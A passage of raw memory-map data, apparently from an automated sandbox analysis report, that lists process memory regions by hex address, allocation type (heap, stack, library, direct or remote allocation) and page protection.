trusted library allocation
|
page execute and read and write
|
||
50E5000
|
heap
|
page execute and read and write
|
||
56AB000
|
trusted library allocation
|
page read and write
|
||
4D0A000
|
trusted library allocation
|
page read and write
|
||
8E9F000
|
trusted library allocation
|
page read and write
|
||
4D23000
|
trusted library allocation
|
page read and write
|
||
8190000
|
trusted library allocation
|
page read and write
|
||
6BD5000
|
heap
|
page read and write
|
||
4D06000
|
trusted library allocation
|
page read and write
|
||
54F6000
|
trusted library allocation
|
page read and write
|
||
7AE7000
|
heap
|
page read and write
|
||
8AC0000
|
heap
|
page read and write
|
||
7F2E000
|
stack
|
page read and write
|
||
5BE000
|
stack
|
page read and write
|
||
C5E000
|
heap
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
44B0000
|
heap
|
page read and write
|
||
72ED000
|
stack
|
page read and write
|
||
7C7D000
|
stack
|
page read and write
|
||
4D77000
|
trusted library allocation
|
page read and write
|
||
4F28000
|
trusted library allocation
|
page read and write
|
||
4CC7000
|
heap
|
page read and write
|
||
77DE000
|
stack
|
page read and write
|
||
36B0000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
741B000
|
stack
|
page read and write
|
||
48E1000
|
trusted library allocation
|
page read and write
|
||
8C4E000
|
stack
|
page read and write
|
||
7F60000
|
trusted library allocation
|
page read and write
|
||
5E8000
|
heap
|
page read and write
|
||
3547000
|
heap
|
page read and write
|
||
7F0000
|
trusted library allocation
|
page read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
D9A000
|
heap
|
page read and write
|
||
7B02000
|
heap
|
page read and write
|
||
DFF000
|
heap
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
4D05000
|
trusted library allocation
|
page read and write
|
||
74C0000
|
heap
|
page read and write
|
||
76DE000
|
stack
|
page read and write
|
||
735E000
|
stack
|
page read and write
|
||
850000
|
heap
|
page execute and read and write
|
||
3350000
|
heap
|
page read and write
|
||
45B7000
|
trusted library allocation
|
page execute and read and write
|
||
5530000
|
trusted library allocation
|
page read and write
|
||
5E8A000
|
trusted library allocation
|
page read and write
|
||
872F000
|
stack
|
page read and write
|
||
5451000
|
trusted library allocation
|
page read and write
|
||
732E000
|
stack
|
page read and write
|
||
8940000
|
heap
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
7E7D000
|
stack
|
page read and write
|
||
4CAE000
|
stack
|
page read and write
|
||
8D8E000
|
stack
|
page read and write
|
||
63A9000
|
trusted library allocation
|
page read and write
|
||
9E5000
|
heap
|
page read and write
|
||
3690000
|
trusted library allocation
|
page read and write
|
||
7EB0000
|
trusted library allocation
|
page read and write
|
||
5472000
|
trusted library allocation
|
page read and write
|
||
7FD000
|
trusted library allocation
|
page execute and read and write
|
||
1C0000
|
heap
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
6F90000
|
trusted library allocation
|
page read and write
|
||
61F5000
|
trusted library allocation
|
page read and write
|
||
2926000
|
heap
|
page read and write
|
||
CBA000
|
heap
|
page read and write
|
||
4D0A000
|
trusted library allocation
|
page read and write
|
||
6BFD000
|
stack
|
page read and write
|
||
5519000
|
trusted library allocation
|
page read and write
|
||
4D03000
|
trusted library allocation
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
8EBE000
|
stack
|
page read and write
|
||
3971000
|
trusted library allocation
|
page read and write
|
||
2FFF000
|
unkown
|
page read and write
|
||
8EF0000
|
trusted library allocation
|
page execute and read and write
|
||
B4F000
|
stack
|
page read and write
|
||
4CFA000
|
trusted library allocation
|
page read and write
|
||
4E30000
|
trusted library allocation
|
page read and write
|
||
70FE000
|
heap
|
page read and write
|
||
80D0000
|
direct allocation
|
page read and write
|
||
7360000
|
trusted library allocation
|
page read and write
|
||
4FB0000
|
trusted library allocation
|
page execute and read and write
|
||
704D000
|
stack
|
page read and write
|
||
3480000
|
heap
|
page read and write
|
||
2A10000
|
heap
|
page execute and read and write
|
||
47D000
|
stack
|
page read and write
|
||
4CA0000
|
trusted library allocation
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
8C6E000
|
stack
|
page read and write
|
||
35BC000
|
heap
|
page read and write
|
||
7ADF000
|
stack
|
page read and write
|
||
88CB000
|
trusted library allocation
|
page read and write
|
||
4CF4000
|
trusted library allocation
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
4CE9000
|
trusted library allocation
|
page read and write
|
||
E75000
|
heap
|
page execute and read and write
|
||
8E2E000
|
stack
|
page read and write
|
||
45E0000
|
trusted library allocation
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
89E000
|
stack
|
page read and write
|
||
8E9A000
|
trusted library allocation
|
page read and write
|
||
492000
|
unkown
|
page readonly
|
||
7ED0000
|
trusted library allocation
|
page execute and read and write
|
||
4D03000
|
trusted library allocation
|
page read and write
|
||
6DDE000
|
stack
|
page read and write
|
||
2B70000
|
heap
|
page read and write
|
||
8E0000
|
heap
|
page read and write
|
||
2960000
|
trusted library allocation
|
page read and write
|
||
6F9B0000
|
unkown
|
page readonly
|
||
E50000
|
heap
|
page read and write
|
||
7C29000
|
heap
|
page read and write
|
||
4CE1000
|
trusted library allocation
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
AF9000
|
trusted library allocation
|
page read and write
|
||
4D57000
|
trusted library allocation
|
page read and write
|
||
7774000
|
heap
|
page read and write
|
||
4EC4000
|
trusted library allocation
|
page read and write
|
||
5721000
|
trusted library allocation
|
page read and write
|
||
26EE000
|
stack
|
page read and write
|
||
883E000
|
stack
|
page read and write
|
||
36A8000
|
trusted library allocation
|
page read and write
|
||
2730000
|
trusted library allocation
|
page execute and read and write
|
||
8A0000
|
heap
|
page readonly
|
||
7CCE000
|
stack
|
page read and write
|
||
6CBB000
|
stack
|
page read and write
|
||
513B000
|
heap
|
page read and write
|
||
6D7E000
|
stack
|
page read and write
|
||
4D44000
|
trusted library allocation
|
page read and write
|
||
4D2C000
|
trusted library allocation
|
page read and write
|
||
6C2C000
|
heap
|
page read and write
|
||
7E2D000
|
stack
|
page read and write
|
||
437F000
|
stack
|
page read and write
|
||
7C44000
|
heap
|
page read and write
|
||
4D11000
|
trusted library allocation
|
page read and write
|
||
8E70000
|
trusted library allocation
|
page read and write
|
||
4ABC000
|
trusted library allocation
|
page read and write
|
||
4D22000
|
trusted library allocation
|
page read and write
|
||
8F9000
|
heap
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
4EF0000
|
unkown
|
page readonly
|
||
8B0000
|
trusted library allocation
|
page execute and read and write
|
||
43FF000
|
stack
|
page read and write
|
||
793E000
|
stack
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
78CA000
|
heap
|
page read and write
|
||
5010000
|
trusted library allocation
|
page read and write
|
||
4CFA000
|
trusted library allocation
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
6D6E000
|
stack
|
page read and write
|
||
74D0000
|
heap
|
page read and write
|
||
7AAF000
|
heap
|
page read and write
|
||
6FE0000
|
trusted library allocation
|
page read and write
|
||
739E000
|
stack
|
page read and write
|
||
8CEE000
|
stack
|
page read and write
|
||
688B000
|
stack
|
page read and write
|
||
6CE1000
|
heap
|
page read and write
|
||
725E000
|
stack
|
page read and write
|
||
5679000
|
heap
|
page read and write
|
||
706A000
|
heap
|
page read and write
|
||
32E8000
|
heap
|
page read and write
|
||
4CE8000
|
trusted library allocation
|
page read and write
|
||
298B000
|
heap
|
page read and write
|
||
55DF000
|
stack
|
page read and write
|
||
63D4000
|
trusted library allocation
|
page read and write
|
||
68BF1000
|
unkown
|
page execute read
|
||
2C13000
|
heap
|
page read and write
|
||
766E000
|
stack
|
page read and write
|
||
E54000
|
heap
|
page read and write
|
||
B67000
|
heap
|
page read and write
|
||
5719000
|
trusted library allocation
|
page read and write
|
||
B3C000
|
heap
|
page read and write
|
||
4D82000
|
trusted library allocation
|
page read and write
|
||
3553000
|
trusted library allocation
|
page execute and read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
8B0E000
|
stack
|
page read and write
|
||
691D000
|
stack
|
page read and write
|
||
966000
|
heap
|
page read and write
|
||
3560000
|
trusted library allocation
|
page read and write
|
||
5143000
|
heap
|
page read and write
|
||
511E000
|
heap
|
page read and write
|
||
53CE000
|
stack
|
page read and write
|
||
2F9000
|
stack
|
page read and write
|
||
8365000
|
trusted library allocation
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
8E0000
|
heap
|
page read and write
|
||
55B4000
|
trusted library allocation
|
page read and write
|
||
7AAE000
|
stack
|
page read and write
|
||
6D2B000
|
stack
|
page read and write
|
||
5090000
|
direct allocation
|
page read and write
|
||
6DBA000
|
direct allocation
|
page read and write
|
||
2C11000
|
heap
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
4D36000
|
trusted library allocation
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
66CD000
|
stack
|
page read and write
|
||
8A40000
|
trusted library allocation
|
page read and write
|
||
3464000
|
trusted library allocation
|
page read and write
|
||
4600000
|
heap
|
page execute and read and write
|
||
36D0000
|
heap
|
page readonly
|
||
452C000
|
stack
|
page read and write
|
||
6011000
|
trusted library allocation
|
page read and write
|
||
7C09000
|
heap
|
page read and write
|
||
6EBE000
|
stack
|
page read and write
|
||
4CFE000
|
trusted library allocation
|
page read and write
|
||
815D000
|
stack
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page read and write
|
||
3476000
|
heap
|
page read and write
|
||
366D000
|
trusted library allocation
|
page execute and read and write
|
||
73C0000
|
trusted library allocation
|
page read and write
|
||
6BAD000
|
stack
|
page read and write
|
||
766D000
|
stack
|
page read and write
|
||
539D000
|
stack
|
page read and write
|
||
7D20000
|
trusted library allocation
|
page execute and read and write
|
||
78E6000
|
heap
|
page read and write
|
||
81F000
|
stack
|
page read and write
|
||
6EEF000
|
heap
|
page read and write
|
||
7DAD000
|
stack
|
page read and write
|
||
4E80000
|
trusted library allocation
|
page execute and read and write
|
||
7D40000
|
heap
|
page execute and read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
7970000
|
trusted library allocation
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
292E000
|
stack
|
page read and write
|
||
71D0000
|
trusted library allocation
|
page read and write
|
||
2979000
|
heap
|
page read and write
|
||
7AB5000
|
heap
|
page read and write
|
||
6F9BC000
|
unkown
|
page readonly
|
||
968E000
|
stack
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
E5C000
|
stack
|
page read and write
|
||
4D11000
|
trusted library allocation
|
page read and write
|
||
4B40000
|
trusted library allocation
|
page read and write
|
||
4C0E000
|
stack
|
page read and write
|
||
A80000
|
trusted library allocation
|
page read and write
|
||
6CDE000
|
stack
|
page read and write
|
||
8AED000
|
heap
|
page read and write
|
||
7A6E000
|
stack
|
page read and write
|
||
731A000
|
stack
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
6A4E000
|
stack
|
page read and write
|
||
8DCE000
|
stack
|
page read and write
|
||
36E0000
|
trusted library allocation
|
page execute and read and write
|
||
A05000
|
heap
|
page read and write
|
||
53DE000
|
stack
|
page read and write
|
||
3365000
|
trusted library allocation
|
page execute and read and write
|
||
137F000
|
stack
|
page read and write
|
||
EC0000
|
trusted library allocation
|
page read and write
|
||
77F0000
|
heap
|
page read and write
|
||
35F0000
|
trusted library allocation
|
page read and write
|
||
E2D000
|
unkown
|
page read and write
|
||
4FDE000
|
stack
|
page read and write
|
||
56B0000
|
heap
|
page read and write
|
||
25EE000
|
stack
|
page read and write
|
||
6E0B000
|
direct allocation
|
page read and write
|
||
4D38000
|
trusted library allocation
|
page read and write
|
||
4CEE000
|
trusted library allocation
|
page read and write
|
||
36A0000
|
trusted library allocation
|
page read and write
|
||
8132000
|
heap
|
page read and write
|
||
874E000
|
stack
|
page read and write
|
||
2978000
|
heap
|
page read and write
|
||
7EDE000
|
stack
|
page read and write
|
||
9A9000
|
heap
|
page read and write
|
||
B44000
|
heap
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
7B70000
|
trusted library allocation
|
page read and write
|
||
4D8E000
|
trusted library allocation
|
page read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
8510000
|
trusted library allocation
|
page execute and read and write
|
||
52F0000
|
heap
|
page execute and read and write
|
||
7BB0000
|
trusted library allocation
|
page read and write
|
||
8054000
|
heap
|
page read and write
|
||
90F000
|
stack
|
page read and write
|
||
2F27000
|
stack
|
page read and write
|
||
4EC2000
|
trusted library allocation
|
page read and write
|
||
85DE000
|
stack
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
B8E000
|
stack
|
page read and write
|
||
3508000
|
heap
|
page read and write
|
||
25E4000
|
remote allocation
|
page readonly
|
||
35DE000
|
stack
|
page read and write
|
||
5177000
|
trusted library allocation
|
page read and write
|
||
4DF9000
|
stack
|
page read and write
|
||
54FE000
|
trusted library allocation
|
page read and write
|
||
78E1000
|
heap
|
page read and write
|
||
91E000
|
stack
|
page read and write
|
||
6FF0000
|
heap
|
page read and write
|
||
50E0000
|
heap
|
page execute and read and write
|
||
2965000
|
heap
|
page read and write
|
||
7D10000
|
heap
|
page read and write
|
||
35E0000
|
trusted library allocation
|
page read and write
|
||
5189000
|
trusted library allocation
|
page read and write
|
||
70BE000
|
heap
|
page read and write
|
||
5270000
|
trusted library allocation
|
page execute and read and write
|
||
7902000
|
heap
|
page read and write
|
||
541F000
|
stack
|
page read and write
|
||
352B000
|
heap
|
page read and write
|
||
6C28000
|
heap
|
page read and write
|
||
AED000
|
trusted library allocation
|
page execute and read and write
|
||
4DEE000
|
stack
|
page read and write
|
||
7C89000
|
trusted library allocation
|
page read and write
|
||
43D0000
|
heap
|
page read and write
|
||
3490000
|
trusted library allocation
|
page read and write
|
||
32BE000
|
stack
|
page read and write
|
||
6D80000
|
direct allocation
|
page read and write
|
||
512F000
|
stack
|
page read and write
|
||
4D0D000
|
trusted library allocation
|
page read and write
|
||
9B8000
|
heap
|
page read and write
|
||
CD9000
|
stack
|
page read and write
|
||
9A4000
|
heap
|
page read and write
|
||
53DE000
|
stack
|
page read and write
|
||
5661000
|
heap
|
page read and write
|
||
4CA6000
|
trusted library allocation
|
page read and write
|
||
5050000
|
direct allocation
|
page read and write
|
||
6F60000
|
trusted library allocation
|
page read and write
|
||
6D31000
|
trusted library allocation
|
page read and write
|
||
77F000
|
stack
|
page read and write
|
||
4CF0000
|
trusted library allocation
|
page read and write
|
||
65F000
|
stack
|
page read and write
|
||
4E60000
|
heap
|
page readonly
|
||
6039000
|
trusted library allocation
|
page read and write
|
||
528E000
|
stack
|
page read and write
|
||
15D000
|
stack
|
page read and write
|
||
8AA0000
|
heap
|
page read and write
|
||
55E1000
|
trusted library allocation
|
page read and write
|
||
777D000
|
stack
|
page read and write
|
||
45B0000
|
trusted library allocation
|
page read and write
|
||
89BE000
|
trusted library allocation
|
page read and write
|
||
5694000
|
heap
|
page read and write
|
||
7386000
|
direct allocation
|
page read and write
|
||
88BE000
|
stack
|
page read and write
|
||
779F000
|
stack
|
page read and write
|
||
C77000
|
heap
|
page read and write
|
||
BD0000
|
heap
|
page read and write
|
||
54A0000
|
heap
|
page read and write
|
||
DAD000
|
stack
|
page read and write
|
||
4F97000
|
trusted library allocation
|
page read and write
|
||
78CD000
|
heap
|
page read and write
|
||
75B000
|
stack
|
page read and write
|
||
7D90000
|
trusted library allocation
|
page read and write
|
||
5071000
|
trusted library allocation
|
page read and write
|
||
3503000
|
heap
|
page read and write
|
||
749E000
|
stack
|
page read and write
|
||
4D65000
|
trusted library allocation
|
page read and write
|
||
7D70000
|
trusted library allocation
|
page read and write
|
||
36C0000
|
heap
|
page read and write
|
||
757D000
|
stack
|
page read and write
|
||
4BAD000
|
stack
|
page read and write
|
||
6A4D000
|
stack
|
page read and write
|
||
4CEB000
|
trusted library allocation
|
page read and write
|
||
C9C000
|
stack
|
page read and write
|
||
878F000
|
stack
|
page read and write
|
||
748F000
|
stack
|
page read and write
|
||
AA4000
|
trusted library allocation
|
page read and write
|
||
5211000
|
trusted library allocation
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
958E000
|
stack
|
page read and write
|
||
5EA4000
|
trusted library allocation
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
5906000
|
trusted library allocation
|
page read and write
|
||
34AA000
|
heap
|
page read and write
|
||
BA0000
|
trusted library allocation
|
page read and write
|
||
50CE000
|
stack
|
page read and write
|
||
BAB000
|
heap
|
page read and write
|
||
E15000
|
heap
|
page execute and read and write
|
||
76AA000
|
stack
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
E70000
|
trusted library allocation
|
page read and write
|
||
684E000
|
stack
|
page read and write
|
||
BA5000
|
trusted library allocation
|
page execute and read and write
|
||
70CA000
|
heap
|
page read and write
|
||
2D7D000
|
heap
|
page read and write
|
||
69E000
|
stack
|
page read and write
|
||
8E88000
|
trusted library allocation
|
page read and write
|
||
4962000
|
trusted library allocation
|
page read and write
|
||
6E7E000
|
stack
|
page read and write
|
||
7260000
|
heap
|
page execute and read and write
|
||
7AC5000
|
heap
|
page read and write
|
||
2998000
|
heap
|
page read and write
|
||
87B0000
|
trusted library allocation
|
page execute and read and write
|
||
355D000
|
stack
|
page read and write
|
||
7F770000
|
trusted library allocation
|
page execute and read and write
|
||
77AC000
|
heap
|
page read and write
|
||
4C77000
|
trusted library allocation
|
page read and write
|
||
805F000
|
direct allocation
|
page read and write
|
||
855D000
|
stack
|
page read and write
|
||
89C0000
|
heap
|
page read and write
|
||
805F000
|
direct allocation
|
page read and write
|
||
952D000
|
stack
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
6DBA000
|
direct allocation
|
page read and write
|
||
274E000
|
stack
|
page read and write
|
||
368E000
|
stack
|
page read and write
|
||
74DD000
|
stack
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
526D000
|
stack
|
page read and write
|
||
7036000
|
heap
|
page read and write
|
||
7EBF000
|
stack
|
page read and write
|
||
742E000
|
stack
|
page read and write
|
||
2E30000
|
heap
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
3692000
|
trusted library allocation
|
page read and write
|
||
354B000
|
heap
|
page read and write
|
||
8050000
|
direct allocation
|
page read and write
|
||
459E000
|
stack
|
page read and write
|
||
566B000
|
heap
|
page read and write
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
4611000
|
trusted library allocation
|
page read and write
|
||
4D2A000
|
trusted library allocation
|
page read and write
|
||
89F7000
|
trusted library allocation
|
page read and write
|
||
C7E000
|
stack
|
page read and write
|
||
4CF9000
|
trusted library allocation
|
page read and write
|
||
AB0000
|
trusted library allocation
|
page read and write
|
||
4810000
|
heap
|
page read and write
|
||
70F1000
|
heap
|
page read and write
|
||
5357000
|
trusted library allocation
|
page read and write
|
||
512C000
|
heap
|
page read and write
|
||
525C000
|
trusted library allocation
|
page read and write
|
||
4919000
|
trusted library allocation
|
page read and write
|
||
70AF000
|
heap
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
4E2F000
|
stack
|
page read and write
|
||
6C70000
|
trusted library allocation
|
page read and write
|
||
4D22000
|
trusted library allocation
|
page read and write
|
||
4E50000
|
heap
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
4F1E000
|
stack
|
page read and write
|
||
565E000
|
heap
|
page read and write
|
||
2C06000
|
heap
|
page read and write
|
||
73E0000
|
trusted library allocation
|
page read and write
|
||
7AF0000
|
trusted library allocation
|
page read and write
|
||
5684000
|
heap
|
page read and write
|
||
5232000
|
trusted library allocation
|
page read and write
|
||
A2E000
|
stack
|
page read and write
|
||
7856000
|
heap
|
page read and write
|
||
5180000
|
heap
|
page execute and read and write
|
||
7DFB000
|
trusted library allocation
|
page read and write
|
||
8B5F000
|
heap
|
page read and write
|
||
351D000
|
heap
|
page read and write
|
||
297C000
|
heap
|
page read and write
|
||
6199000
|
trusted library allocation
|
page read and write
|
||
7840000
|
trusted library allocation
|
page read and write
|
||
35FD000
|
trusted library allocation
|
page execute and read and write
|
||
6E1B000
|
stack
|
page read and write
|
||
B37000
|
heap
|
page read and write
|
||
593E000
|
stack
|
page read and write
|
||
4CE9000
|
trusted library allocation
|
page read and write
|
||
70DE000
|
stack
|
page read and write
|
||
36D0000
|
trusted library allocation
|
page read and write
|
||
5A0F000
|
trusted library allocation
|
page read and write
|
||
50E8000
|
heap
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
7960000
|
heap
|
page execute and read and write
|
||
7082000
|
heap
|
page read and write
|
||
6FE0000
|
heap
|
page read and write
|
||
2981000
|
heap
|
page read and write
|
||
6207000
|
trusted library allocation
|
page read and write
|
||
4E37000
|
trusted library allocation
|
page execute and read and write
|
||
2960000
|
heap
|
page read and write
|
||
7F40000
|
trusted library allocation
|
page execute and read and write
|
||
44E0000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
3448000
|
heap
|
page read and write
|
||
A90000
|
heap
|
page read and write
|
||
5500000
|
heap
|
page execute and read and write
|
||
715D000
|
stack
|
page read and write
|
||
4CEE000
|
trusted library allocation
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
4641000
|
trusted library allocation
|
page read and write
|
||
8B4D000
|
stack
|
page read and write
|
||
71F0000
|
trusted library allocation
|
page read and write
|
||
8E6E000
|
stack
|
page read and write
|
||
D0D000
|
heap
|
page read and write
|
||
7804000
|
heap
|
page read and write
|
||
7A4E000
|
stack
|
page read and write
|
||
80AB000
|
heap
|
page read and write
|
||
4D4D000
|
trusted library allocation
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
89FA000
|
trusted library allocation
|
page read and write
|
||
9039000
|
stack
|
page read and write
|
||
7E00000
|
heap
|
page read and write
|
||
811D000
|
stack
|
page read and write
|
||
3324000
|
trusted library allocation
|
page read and write
|
||
98A000
|
stack
|
page read and write
|
||
50B0000
|
direct allocation
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
4D94000
|
trusted library allocation
|
page read and write
|
||
34CD000
|
heap
|
page read and write
|
||
69CC000
|
stack
|
page read and write
|
||
B1E000
|
heap
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
988000
|
heap
|
page read and write
|
||
53A7000
|
trusted library allocation
|
page read and write
|
||
506E000
|
direct allocation
|
page read and write
|
||
78BB000
|
stack
|
page read and write
|
||
73BE000
|
stack
|
page read and write
|
||
4CC0000
|
heap
|
page read and write
|
||
4D84000
|
trusted library allocation
|
page read and write
|
||
711E000
|
stack
|
page read and write
|
||
4EF2000
|
unkown
|
page execute read
|
||
722D000
|
stack
|
page read and write
|
||
4E94000
|
trusted library allocation
|
page read and write
|
||
298B000
|
heap
|
page read and write
|
||
4D03000
|
trusted library allocation
|
page read and write
|
||
3318000
|
heap
|
page read and write
|
||
8E8F000
|
trusted library allocation
|
page read and write
|
||
88D0000
|
trusted library allocation
|
page execute and read and write
|
||
4CAE000
|
trusted library allocation
|
page read and write
|
||
27CE000
|
stack
|
page read and write
|
||
346D000
|
trusted library allocation
|
page execute and read and write
|
||
E70000
|
heap
|
page execute and read and write
|
||
5010000
|
trusted library allocation
|
page read and write
|
||
4F20000
|
trusted library allocation
|
page read and write
|
||
8800000
|
trusted library allocation
|
page read and write
|
||
6C56000
|
heap
|
page read and write
|
||
6FA0000
|
trusted library allocation
|
page read and write
|
||
5561000
|
trusted library allocation
|
page read and write
|
||
8B7E000
|
stack
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
8FD2000
|
trusted library allocation
|
page read and write
|
||
7AE2000
|
trusted library allocation
|
page read and write
|
||
5135000
|
heap
|
page read and write
|
||
34F0000
|
trusted library allocation
|
page read and write
|
||
2770000
|
trusted library allocation
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
BF0000
|
trusted library allocation
|
page read and write
|
||
99CE000
|
stack
|
page read and write
|
||
521D000
|
trusted library allocation
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
79CF000
|
stack
|
page read and write
|
||
3380000
|
trusted library allocation
|
page read and write
|
||
48D0000
|
heap
|
page read and write
|
||
988F000
|
stack
|
page read and write
|
||
4CF0000
|
trusted library allocation
|
page read and write
|
||
77A1000
|
heap
|
page read and write
|
||
707F000
|
heap
|
page read and write
|
||
4D16000
|
trusted library allocation
|
page read and write
|
||
347D000
|
trusted library allocation
|
page execute and read and write
|
||
B7C000
|
heap
|
page read and write
|
||
8040000
|
heap
|
page read and write
|
||
45A0000
|
trusted library allocation
|
page read and write
|
||
7710000
|
heap
|
page read and write
|
||
890D000
|
trusted library allocation
|
page read and write
|
||
820000
|
trusted library allocation
|
page read and write
|
||
49EC000
|
stack
|
page read and write
|
||
36F7000
|
heap
|
page read and write
|
||
4EE0000
|
trusted library allocation
|
page read and write
|
||
6EBE000
|
stack
|
page read and write
|
||
3304000
|
trusted library allocation
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
6D2E000
|
stack
|
page read and write
|
||
9F6000
|
heap
|
page read and write
|
||
3278000
|
stack
|
page read and write
|
||
8BBF000
|
stack
|
page read and write
|
||
2960000
|
heap
|
page execute and read and write
|
||
ABF000
|
stack
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
AE0000
|
trusted library allocation
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
8ED3000
|
trusted library allocation
|
page read and write
|
||
4E04000
|
trusted library allocation
|
page read and write
|
||
6ACE000
|
stack
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
3429000
|
heap
|
page read and write
|
||
75B000
|
heap
|
page read and write
|
||
4B5E000
|
stack
|
page read and write
|
||
89F0000
|
trusted library allocation
|
page read and write
|
||
8B50000
|
heap
|
page read and write
|
||
7D20000
|
heap
|
page execute and read and write
|
||
7BB0000
|
trusted library allocation
|
page read and write
|
||
5103000
|
heap
|
page read and write
|
||
3345000
|
trusted library allocation
|
page execute and read and write
|
||
4920000
|
trusted library allocation
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
69BE000
|
stack
|
page read and write
|
||
7170000
|
trusted library allocation
|
page read and write
|
||
75AE000
|
stack
|
page read and write
|
||
6F70000
|
trusted library allocation
|
page read and write
|
||
5011000
|
trusted library allocation
|
page read and write
|
||
2ADD000
|
stack
|
page read and write
|
||
68D000
|
heap
|
page read and write
|
||
503E000
|
stack
|
page read and write
|
||
5904000
|
trusted library allocation
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
8378000
|
trusted library allocation
|
page read and write
|
||
4D60000
|
heap
|
page execute and read and write
|
||
4D1F000
|
trusted library allocation
|
page read and write
|
||
6CB0000
|
trusted library allocation
|
page read and write
|
||
327D000
|
stack
|
page read and write
|
||
1480000
|
heap
|
page read and write
|
||
772A000
|
stack
|
page read and write
|
||
7B70000
|
heap
|
page read and write
|
||
773B000
|
stack
|
page read and write
|
||
298C000
|
heap
|
page read and write
|
||
55EE000
|
stack
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
2C02000
|
heap
|
page read and write
|
||
52AE000
|
stack
|
page read and write
|
||
2750000
|
heap
|
page read and write
|
||
95E000
|
stack
|
page read and write
|
||
7D00000
|
trusted library allocation
|
page read and write
|
||
8410000
|
trusted library allocation
|
page execute and read and write
|
||
4E1C000
|
trusted library allocation
|
page read and write
|
||
58E0000
|
trusted library allocation
|
page read and write
|
||
6A0E000
|
stack
|
page read and write
|
||
73A0000
|
direct allocation
|
page read and write
|
||
7970000
|
trusted library allocation
|
page read and write
|
||
716C000
|
heap
|
page read and write
|
||
F0B000
|
trusted library allocation
|
page execute and read and write
|
||
DEE000
|
heap
|
page read and write
|
||
4CA2000
|
trusted library allocation
|
page read and write
|
||
75AE000
|
stack
|
page read and write
|
||
50C2000
|
trusted library allocation
|
page read and write
|
||
6F9B2000
|
unkown
|
page execute read
|
||
7CB6000
|
heap
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
7740000
|
heap
|
page read and write
|
||
7882000
|
heap
|
page read and write
|
||
71A0000
|
trusted library allocation
|
page read and write
|
||
540000
|
unkown
|
page execute and read and write
|
||
730D000
|
stack
|
page read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
4F6D000
|
stack
|
page read and write
|
||
6CEE000
|
stack
|
page read and write
|
||
45AD000
|
trusted library allocation
|
page execute and read and write
|
||
6B3B000
|
stack
|
page read and write
|
||
32E5000
|
heap
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
7C70000
|
heap
|
page read and write
|
||
6FDD000
|
stack
|
page read and write
|
||
2C28000
|
heap
|
page read and write
|
||
744E000
|
stack
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
56A3000
|
heap
|
page read and write
|
||
2908000
|
heap
|
page read and write
|
||
4831000
|
trusted library allocation
|
page read and write
|
||
7390000
|
trusted library allocation
|
page read and write
|
||
809000
|
trusted library allocation
|
page read and write
|
||
83C0000
|
trusted library allocation
|
page read and write
|
||
7FA0000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
trusted library allocation
|
page read and write
|
||
68C0B000
|
unkown
|
page readonly
|
||
3440000
|
heap
|
page read and write
|
||
4CF0000
|
trusted library allocation
|
page read and write
|
||
8B63000
|
heap
|
page read and write
|
||
8AB4000
|
heap
|
page read and write
|
||
85D0000
|
trusted library allocation
|
page execute and read and write
|
||
7DD3000
|
trusted library allocation
|
page read and write
|
||
3525000
|
heap
|
